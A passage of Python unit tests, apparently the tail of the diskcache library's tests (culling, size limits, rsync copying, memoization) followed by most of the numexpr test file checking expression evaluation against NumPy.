args = pragma, result, [(value,)]
print('pragma %s mismatch: %r != %r' % args)
valid = False
results.append(valid)
threads = []
for count in range(8):
thread = threading.Thread(target=compare_pragmas)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert all(results)
def test_size_limit_with_files(cache):
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_size_limit_with_database(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_eviction_policy_none(cache):
cache.reset('eviction_policy', 'none')
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() > size_limit
def test_cull_size_limit_0(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', 0)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_timeout(cache):
transact = mock.Mock()
transact.side_effect = [dc.Timeout]
with mock.patch.object(cache, 'expire', lambda now: 0):
with mock.patch.object(cache, 'volume', lambda: int(1e12)):
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.cull()
def test_key_roundtrip(cache):
key_part_0 = u"part0"
key_part_1 = u"part1"
to_test = [
(key_part_0, key_part_1),
[key_part_0, key_part_1],
]
for key in to_test:
cache.clear()
cache[key] = {'example0': ['value0']}
keys = list(cache)
assert len(keys) == 1
cache_key = keys[0]
assert cache[key] == {'example0': ['value0']}
assert cache[cache_key] == {'example0': ['value0']}
def test_constant():
import diskcache.core
assert repr(diskcache.core.ENOVAL) == 'ENOVAL'
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.Cache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.Cache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.Cache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.Cache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def test_custom_eviction_policy(cache):
dc.EVICTION_POLICY['lru-gt-1s'] = {
'init': (
'CREATE INDEX IF NOT EXISTS Cache_access_time ON'
' Cache (access_time)'
),
'get': 'access_time = {now}',
'cull': (
'SELECT {fields} FROM Cache'
' WHERE access_time < ({now} - 1)'
' ORDER BY access_time LIMIT ?'
),
}
size_limit = int(1e5)
cache.reset('eviction_policy', 'lru-gt-1s')
cache.reset('size_limit', size_limit)
for count in range(100, 150):
cache[count] = str(count) * 500
size = cache.volume()
assert size > size_limit
assert cache.cull() == 0
assert size == cache.volume()
for count in range(100, 150):
assert cache[count] == str(count) * 500
time.sleep(1.1)
assert cache.cull() > 0
assert cache.volume() < size_limit
def test_lru_incr(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.incr(0)
cache.decr(0)
assert cache[0] == 0
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == (hits1 + count)
assert misses2 == misses1
|
test_numexpr.py
|
###################################################################
# Numexpr - Fast numerical array expression evaluator for NumPy.
#
# License: MIT
# Author: See AUTHORS.txt
#
# See LICENSE.txt and LICENSES/*.txt for details about copyright and
# rights to use.
####################################################################
import os
import sys
import platform
import warnings
from contextlib import contextmanager
import subprocess
import numpy as np
from numpy import (
array, arange, empty, zeros, int32, int64, uint16, complex_, float64, rec,
copy, ones_like, where, alltrue, linspace,
sum, prod, sqrt, fmod, floor, ceil,
sin, cos, tan, arcsin, arccos, arctan, arctan2,
sinh, cosh, tanh, arcsinh, arccosh, arctanh,
log, log1p, log10, exp, expm1, conj)
from numpy.testing import (assert_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose)
from numpy import shape, allclose, array_equal, ravel, isnan, isinf
import numexpr
from numexpr import E, NumExpr, evaluate, re_evaluate, disassemble, use_vml
import unittest
TestCase = unittest.TestCase
double = np.double
if sys.version_info[0] >= 3:
long = int
# Recommended minimum versions
from distutils.version import LooseVersion
minimum_numpy_version = LooseVersion('1.7.0')
present_numpy_version = LooseVersion(np.__version__)
class test_numexpr(TestCase):
"""Testing with 1 thread"""
nthreads = 1
def setUp(self):
numexpr.set_num_threads(self.nthreads)
def test_simple(self):
ex = 2.0 * E.a + 3.0 * E.b * E.c
sig = [('a', double), ('b', double), ('c', double)]
func = NumExpr(ex, signature=sig)
x = func(array([1., 2, 3]), array([4., 5, 6]), array([7., 8, 9]))
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
func = NumExpr(E.a)
x = arange(100.0)
y = func(x)
assert_array_equal(x, y)
def test_simple_expr(self):
func = NumExpr(E.a)
x = arange(1e6)
y = func(x)
assert_array_equal(x, y)
def test_rational_expr(self):
func = NumExpr((E.a + 2.0 * E.b) / (1 + E.a + 4 * E.b * E.b))
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = func(a, b)
assert_array_almost_equal(x, y)
def test_reductions(self):
# Check that they compile OK.
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=None)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', None)])
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=1)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', 1)])
assert_equal(disassemble(
NumExpr("prod(x**2+2, axis=2)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'prod_ddn', b'r0', b't3', 2)])
# Check that full reductions work.
x = zeros(100000) + .01 # checks issue #41
assert_allclose(evaluate("sum(x+2,axis=None)"), sum(x + 2, axis=None))
assert_allclose(evaluate("sum(x+2,axis=0)"), sum(x + 2, axis=0))
assert_allclose(evaluate("prod(x,axis=0)"), prod(x, axis=0))
assert_allclose(evaluate("min(x)"), np.min(x))
assert_allclose(evaluate("max(x,axis=0)"), np.max(x, axis=0))
# Fix for #277, array with leading singleton dimension
x = np.arange(10).reshape(1,10)
assert_allclose(evaluate("sum(x,axis=None)"), sum(x, axis=None) )
assert_allclose(evaluate("sum(x,axis=0)"), sum(x, axis=0) )
assert_allclose(evaluate("sum(x,axis=1)"), sum(x, axis=1) )
x = arange(10.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
x = arange(100.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
assert_allclose(evaluate("min(x-1,axis=0)"), np.min(x - 1, axis=0))
assert_allclose(evaluate("max(x-1,axis=0)"), np.max(x - 1, axis=0))
x = linspace(0.1, 1.0, 2000)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
assert_allclose(evaluate("min(x-1,axis=0)"), np.min(x - 1, axis=0))
assert_allclose(evaluate("max(x-1,axis=0)"), np.max(x - 1, axis=0))
# Check that reductions along an axis work
y = arange(9.0).reshape(3, 3)
assert_allclose(evaluate("sum(y**2, axis=1)"), sum(y ** 2, axis=1))
assert_allclose(evaluate("sum(y**2, axis=0)"), sum(y ** 2, axis=0))
assert_allclose(evaluate("sum(y**2, axis=None)"), sum(y ** 2, axis=None))
assert_allclose(evaluate("prod(y**2, axis=1)"), prod(y ** 2, axis=1))
assert_allclose(evaluate("prod(y**2, axis=0)"), prod(y ** 2, axis=0))
assert_allclose(evaluate("prod(y**2, axis=None)"), prod(y ** 2, axis=None))
assert_allclose(evaluate("min(y**2, axis=1)"), np.min(y ** 2, axis=1))
assert_allclose(evaluate("min(y**2, axis=0)"), np.min(y ** 2, axis=0))
assert_allclose(evaluate("min(y**2, axis=None)"), np.min(y ** 2, axis=None))
assert_allclose(evaluate("max(y**2, axis=1)"), np.max(y ** 2, axis=1))
assert_allclose(evaluate("max(y**2, axis=0)"), np.max(y ** 2, axis=0))
assert_allclose(evaluate("max(y**2, axis=None)"), np.max(y ** 2, axis=None))
# Check integers
x = arange(10.)
x = x.astype(int)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
# Check longs
x = x.astype(int)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
# Check complex
x = x + .1j
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
def test_in_place(self):
x = arange(10000.).reshape(1000, 10)
evaluate("x + 3", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) + 3)
y = arange(10)
evaluate("(x - 3) * y + (x - 3)", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) * (arange(10) + 1))
def test_axis(self):
y = arange(9.0).reshape(3, 3)
try:
evaluate("sum(y, axis=2)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
evaluate("sum(y, axis=-3)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
# Negative axis are not supported
evaluate("sum(y, axis=-1)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
def test_r0_reuse(self):
assert_equal(disassemble(NumExpr("x * x + 2", [('x', double)])),
[(b'mul_ddd', b'r0', b'r1[x]', b'r1[x]'),
(b'add_ddd', b'r0', b'r0', b'c2[2.0]')])
def test_str_contains_basic0(self):
res = evaluate('contains(b"abc", b"ab")')
assert_equal(res, True)
def test_str_contains_basic1(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(haystack, b"ab")')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic2(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(b"abcd", haystack)')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic3(self):
haystacks = array(
[b'abckkk', b'adef', b'xyz', b'x11abcp', b'za', b'abc'])
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab'])
res = evaluate('contains(haystacks, needles)')
assert_equal(res, [True, True, False, False, False, True])
def test_str_contains_basic4(self):
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab c', b' abc',
b'abc '])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, False, False, False, False, True, True])
def test_str_contains_basic5(self):
needles = array(
[b'abc', b'ab c', b' abc', b' abc ', b'\tabc', b'c h'])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, True, True, False, True])
# Compare operation of Python 'in' operator with 'contains' using a
# product of two lists of strings.
def test_str_contains_listproduct(self):
from itertools import product
small = [
'It w', 'as th', 'e Whit', 'e Rab', 'bit,', ' tro', 'tting',
' sl', 'owly', ' back ', 'again,', ' and', ' lo', 'okin', 'g a',
'nxious', 'ly a', 'bou', 't a', 's it w', 'ent,', ' as i', 'f it',
' had l', 'ost', ' some', 'thi', 'ng; a', 'nd ', 'she ', 'heard ',
'it mut', 'terin', 'g to ', 'its', 'elf ', "'The",
' Duch', 'ess! T', 'he ', 'Duches', 's! Oh ', 'my dea', 'r paws',
'! Oh ', 'my f', 'ur ', 'and ', 'whiske', 'rs! ', 'She', "'ll g",
'et me', ' ex', 'ecu', 'ted, ', 'as su', 're a', 's f', 'errets',
' are f', 'errets', '! Wh', 'ere ', 'CAN', ' I hav', 'e d',
'roppe', 'd t', 'hem,', ' I wo', 'nder?', "' A", 'lice',
' gu', 'essed', ' in a', ' mom', 'ent ', 'tha', 't it w', 'as ',
'looki', 'ng f', 'or ', 'the fa', 'n and ', 'the', ' pai',
'r of w', 'hit', 'e kid', ' glo', 'ves', ', and ', 'she ',
'very g', 'ood', '-na', 'turedl', 'y be', 'gan h', 'unt', 'ing',
' about', ' for t', 'hem', ', but', ' they ', 'wer', 'e nowh',
'ere to', ' be', ' se', 'en--', 'ever', 'ythin', 'g seem', 'ed ',
'to ', 'have c', 'hang', 'ed ', 'since', ' he', 'r swim', ' in',
' the', ' pool,', ' and', ' the g', 'reat ', 'hal', 'l, w', 'ith',
' th', 'e gl', 'ass t', 'abl', 'e and ', 'the', ' li', 'ttle',
' doo', 'r, ha', 'd v', 'ani', 'shed c', 'omp', 'lete', 'ly.']
big = [
'It wa', 's the', ' W', 'hit', 'e ', 'Ra', 'bb', 'it, t', 'ro',
'tting s', 'lowly', ' back ', 'agai', 'n, and', ' l', 'ookin',
'g ', 'an', 'xiously', ' about ', 'as it w', 'ent, as', ' if ',
'it had', ' los', 't ', 'so', 'mething', '; and', ' she h',
'eard ', 'it ', 'mutteri', 'ng to', ' itself', " 'The ",
'Duchess', '! ', 'Th', 'e ', 'Duchess', '! Oh m', 'y de',
'ar paws', '! ', 'Oh my ', 'fu', 'r and w', 'hiskers', "! She'",
'll ', 'get', ' me ', 'execute', 'd,', ' a', 's ', 'su', 're as ',
'fe', 'rrets', ' are f', 'errets!', ' Wher', 'e CAN', ' I ha',
've dro', 'pped t', 'hem', ', I ', 'won', "der?' A",
'lice g', 'uess', 'ed ', 'in a m', 'omen', 't that', ' i',
't was l', 'ook', 'ing f', 'or th', 'e ', 'fan and', ' th', 'e p',
'air o', 'f whit', 'e ki', 'd glove', 's, and ', 'she v', 'ery ',
'good-na', 'tu', 'redl', 'y be', 'gan hun', 'ti', 'ng abou',
't for t', 'he', 'm, bu', 't t', 'hey ', 'were n', 'owhere',
' to b', 'e s', 'een-', '-eve', 'rythi', 'ng see', 'me', 'd ',
'to ha', 've', ' c', 'hanged', ' sinc', 'e her s', 'wim ',
'in the ', 'pool,', ' an', 'd the g', 'rea', 't h', 'all, wi',
'th the ', 'glas', 's t', 'able an', 'd th', 'e littl', 'e door,',
' had va', 'ni', 'shed co', 'mpletel', 'y.']
p = list(product(small, big))
python_in = [x[0] in x[1] for x in p]
a = [x[0].encode() for x in p]
b = [x[1].encode() for x in p]
res = [bool(x) for x in evaluate('contains(b, a)')]
assert_equal(res, python_in)
def test_str_contains_withemptystr1(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(b"abcd", withemptystr)')
assert_equal(res, [True, False, True])
def test_str_contains_withemptystr2(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(withemptystr, b"")')
assert_equal(res, [True, True, True])
def test_str_contains_long_needle(self):
a = b'1' + b'a' * 40
b = b'a' * 40
res = evaluate('contains(a, b)')
assert_equal(res, True)
def test_where_scalar_bool(self):
a = True
b = array([1, 2])
c = array([3, 4])
res = evaluate('where(a, b, c)')
assert_array_equal(res, b)
a = False
res = evaluate('where(a, b, c)')
assert_array_equal(res, c)
def test_refcount(self):
# Regression test for issue #310
a = array([1])
assert sys.getrefcount(a) == 2
evaluate('1')
assert sys.getrefcount(a) == 2
def test_locals_clears_globals(self):
        # Check for issue #313, whereby clearing f_locals also clears f_globals
# if in the top-frame. This cannot be done inside `unittest` as it is always
# executing code in a child frame.
script = r';'.join([
r"import numexpr as ne",
r"a=10",
r"ne.evaluate('1')",
r"a += 1",
r"ne.evaluate('2', local_dict={})",
r"a += 1",
r"ne.evaluate('3', global_dict={})",
r"a += 1",
r"ne.evaluate('4', local_dict={}, global_dict={})",
r"a += 1",
])
# Raises CalledProcessError on a non-normal exit
check = subprocess.check_call([sys.executable, '-c', script])
# Ideally this test should also be done against ipython but it's not
# a requirement.
class test_numexpr2(test_numexpr):
"""Testing with 2 threads"""
nthreads = 2
class test_evaluate(TestCase):
def test_simple(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
x = arange(100.0)
y = evaluate("x")
assert_array_equal(x, y)
def test_simple_expr(self):
x = arange(1e6)
y = evaluate("x")
assert_array_equal(x, y)
def test_re_evaluate(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
x = re_evaluate()
assert_array_equal(x, array([86., 124., 168.]))
def test_re_evaluate_dict(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c", local_dict={'a': a, 'b': b, 'c': c})
x = re_evaluate()
assert_array_equal(x, array([86., 124., 168.]))
# Test for issue #37
if sys.version_info[0] < 3:
        # In Python 3 '/' performs true division, not integer division.
        # Integer division '//' is still not supported by numexpr.
def test_zero_div(self):
x = arange(100, dtype='i4')
y = evaluate("1/x")
x2 = zeros(100, dtype='i4')
x2[1] = 1
assert_array_equal(x2, y)
# Test for issue #22
def test_true_div(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x/2"), x / 2)
assert_array_equal(evaluate("x/2", truediv=False), x / 2)
assert_array_equal(evaluate("x/2", truediv='auto'), x / 2)
assert_array_equal(evaluate("x/2", truediv=True), x / 2.0)
def test_left_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x<<2"), x << 2)
def test_right_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x>>2"), x >> 2)
# PyTables uses __nonzero__ among ExpressionNode objects internally
# so this should be commented out for the moment. See #24.
def test_boolean_operator(self):
x = arange(10, dtype='i4')
try:
evaluate("(x > 1) and (x < 9)")
except TypeError:
pass
else:
raise ValueError("should raise exception!")
def test_rational_expr(self):
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = evaluate("(a + 2*b) / (1 + a + 4*b*b)")
assert_array_almost_equal(x, y)
def test_complex_expr(self):
def complex(a, b):
c = zeros(a.shape, dtype=complex_)
c.real = a
c.imag = b
return c
a = arange(1e4)
b = arange(1e4) ** 1e-5
z = a + 1j * b
x = z.imag
x = sin(complex(a, b)).real + z.imag
y = evaluate("sin(complex(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_strides(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(50).reshape(5, 10)
assert_array_equal(evaluate("a+b"), a + b)
c = empty([10], dtype=[('c1', int32), ('c2', uint16)])
c['c1'] = arange(10)
c['c2'].fill(0xaaaa)
c1 = c['c1']
a0 = a[0]
assert_array_equal(evaluate("c1"), c1)
assert_array_equal(evaluate("a0+c1"), a0 + c1)
def test_recarray_strides(self):
a = arange(100)
b = arange(100,200)
recarr = np.rec.array(None, formats='f4,f4', shape=(100,))
recarr['f0'] = a
recarr['f1'] = b
c = recarr['f1']
assert_array_almost_equal(evaluate("sqrt(c) > 1."), sqrt(c) > 1.)
assert_array_almost_equal(evaluate("log10(c)"), log10(c))
def test_broadcasting(self):
a = arange(100).reshape(10, 10)[::2]
c = arange(10)
d = arange(5).reshape(5, 1)
assert_array_equal(evaluate("a+c"), a + c)
assert_array_equal(evaluate("a+d"), a + d)
expr = NumExpr("2.0*a+3.0*c", [('a', double), ('c', double)])
assert_array_equal(expr(a, c), 2.0 * a + 3.0 * c)
def test_all_scalar(self):
a = 3.
b = 4.
assert_allclose(evaluate("a+b"), a + b)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_equal(expr(a, b), 2 * a + 3 * b)
def test_run(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(10)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_array_equal(expr(a, b), expr.run(a, b))
def test_illegal_value(self):
a = arange(3)
try:
evaluate("a < [0, 0, 0]")
except TypeError:
pass
else:
self.fail()
def test_ex_uses_vml(self):
vml_funcs = [ "sin", "cos", "tan", "arcsin", "arccos", "arctan",
"sinh", "cosh", "tanh", "arcsinh", "arccosh", "arctanh",
"log", "log1p","log10", "exp", "expm1", "abs", "conj",
"arctan2", "fmod"]
for func in vml_funcs:
strexpr = func+'(a)'
_, ex_uses_vml = numexpr.necompiler.getExprNames(strexpr, {})
assert_equal(ex_uses_vml, use_vml, strexpr)
if 'sparc' not in platform.machine():
# Execution order set here so as to not use too many threads
# during the rest of the execution. See #33 for details.
def test_changing_nthreads_00_inc(self):
a = linspace(-1, 1, 1000000)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(1, 7):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
def test_changing_nthreads_01_dec(self):
a = linspace(-1, 1, 1000000)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(6, 1, -1):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
tests = [
('MISC', ['b*c+d*e',
'2*a+3*b',
'-a',
'sinh(a)',
'2*a + (cos(3)+5)*sinh(cos(b))',
'2*a + arctan2(a, b)',
'arcsin(0.5)',
'where(a != 0.0, 2, a)',
'where(a > 10, b < a, b > a)',
'where((a-10).real != 0.0, a, 2)',
'0.25 * (a < 5) + 0.33 * (a >= 5)',
'cos(1+1)',
'1+1',
'1',
'cos(a2)',
])]
optests = []
for op in list('+-*/%') + ['**']:
optests.append("(a+1) %s (b+3)" % op)
optests.append("3 %s (b+3)" % op)
optests.append("(a+1) %s 4" % op)
optests.append("2 %s (b+3)" % op)
optests.append("(a+1) %s 2" % op)
optests.append("(a+1) %s -1" % op)
optests.append("(a+1) %s 0.5" % op)
# Check divisions and modulus by zero (see ticket #107)
optests.append("(a+1) %s 0" % op)
tests.append(('OPERATIONS', optests))
cmptests = []
for op in ['<', '<=', '==', '>=', '>', '!=']:
cmptests.append("a/2+5 %s b" % op)
cmptests.append("a/2+5 %s 7" % op)
cmptests.append("7 %s b" % op)
cmptests.append("7.0 %s 5" % op)
tests.append(('COMPARISONS', cmptests))
func1tests = []
for func in ['copy', 'ones_like', 'sqrt',
'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'log', 'log1p', 'log10', 'exp', 'expm1', 'abs', 'conj',
'ceil', 'floor']:
func1tests.append("a + %s(b+c)" % func)
tests.append(('1_ARG_FUNCS', func1tests))
func2tests = []
for func in ['arctan2', 'fmod']:
func2tests.append("a + %s(b+c, d+1)" % func)
func2tests.append("a + %s(b+c, 1)" % func)
func2tests.append("a + %s(1, d+1)" % func)
tests.append(('2_ARG_FUNCS', func2tests))
powtests = []
# n = -1, 0.5, 2, 4 already handled in section "OPERATIONS"
for n in (-7, -2.5, -1.5, -1.3, -.5, 0, 0.0, 1, 2.3, 2.5, 3):
powtests.append("(a+1)**%s" % n)
tests.append(('POW_TESTS', powtests))
def equal(a, b, exact):
if array_equal(a, b):
return True
if hasattr(a, 'dtype') and a.dtype in ['f4', 'f8']:
nnans = isnan(a).sum()
if nnans > 0:
# For results containing NaNs, just check that the number
# of NaNs is the same in both arrays. This check could be
# made more exhaustive, but checking element by element in
# python space is very expensive in general.
return nnans == isnan(b).sum()
ninfs = isinf(a).sum()
if ninfs > 0:
# Ditto for Inf's
return ninfs == isinf(b).sum()
if exact:
return (shape(a) == shape(b)) and alltrue(ravel(a) == ravel(b), axis=0)
else:
if hasattr(a, 'dtype') and a.dtype == 'f4':
            atol = 1e-5  # Relax precision for special opcodes, like fmod
else:
atol = 1e-8
return (shape(a) == shape(b) and
allclose(ravel(a), ravel(b), atol=atol))
class Skip(Exception): pass
def test_expressions():
test_no = [0]
def make_test_method(a, a2, b, c, d, e, x, expr,
test_scalar, dtype, optimization, exact, section):
this_locals = locals()
def method():
try:
                # We don't want to listen to RuntimeWarnings like
                # "overflows" or "divide by zero" in plain eval().
warnings.simplefilter("ignore")
npval = eval(expr, globals(), this_locals)
warnings.simplefilter("always")
npval = eval(expr, globals(), this_locals)
except Exception as ex:
# just store the exception in a variable
# compatibility with numpy v1.12
# see also https://github.com/pydata/numexpr/issues/239
np_exception = ex
npval = None
else:
np_exception = None
try:
neval = evaluate(expr, local_dict=this_locals,
optimization=optimization)
except AssertionError:
raise
except NotImplementedError:
print('%r not implemented for %s (scalar=%d, opt=%s)'
% (expr, dtype.__name__, test_scalar, optimization))
except Exception as ne_exception:
same_exc_type = issubclass(type(ne_exception),
type(np_exception))
if np_exception is None or not same_exc_type:
print('numexpr error for expression %r' % (expr,))
raise
except:
print('numexpr error for expression %r' % (expr,))
raise
else:
msg = ('expected numexpr error not raised for expression '
'%r' % (expr,))
assert np_exception is None, msg
assert equal(npval, neval, exact), """%r
(test_scalar=%r, dtype=%r, optimization=%r, exact=%r,
npval=%r (%r - %r)\n neval=%r (%r - %r))""" % (expr, test_scalar, dtype.__name__,
optimization, exact,
npval, type(npval), shape(npval),
neval, type(neval), shape(neval))
method.description = ('test_expressions(%s, test_scalar=%r, '
'dtype=%r, optimization=%r, exact=%r)') % (expr, test_scalar, dtype.__name__, optimization, exact)
test_no[0] += 1
method.__name__ = 'test_scalar%d_%s_%s_%s_%04d' % (test_scalar,
dtype.__name__,
optimization.encode('ascii'),
section.encode('ascii'),
test_no[0])
return method
x = None
for test_scalar in (0, 1, 2):
for dtype in (int, int, np.float32, double, complex):
array_size = 100
a = arange(2 * array_size, dtype=dtype)[::2]
a2 = zeros([array_size, array_size], dtype=dtype)
b = arange(array_size, dtype=dtype) / array_size
c = arange(array_size, dtype=dtype)
d = arange(array_size, dtype=dtype)
e = arange(array_size, dtype=dtype)
if dtype == complex:
a = a.real
for x in [a2, b, c, d, e]:
x += 1j
x *= 1 + 1j
if test_scalar == 1:
a = a[array_size // 2]
if test_scalar == 2:
b = b[array_size // 2]
for optimization, exact in [
('none', False), ('moderate', False), ('aggressive', False)]:
for section_name, section_tests in tests:
for expr in section_tests:
if (dtype == complex and
('<' in expr or '>' in expr or '%' in expr
or "arctan2" in expr or "fmod" in expr
or "floor" in expr or "ceil" in expr)):
# skip complex comparisons or functions not
# defined in complex domain.
continue
if (dtype in (int, int) and test_scalar and
expr == '(a+1) ** -1'):
continue
m = make_test_method(a, a2, b, c, d, e, x,
expr, test_scalar, dtype,
optimization, exact,
section_name)
yield m
class test_int64(TestCase):
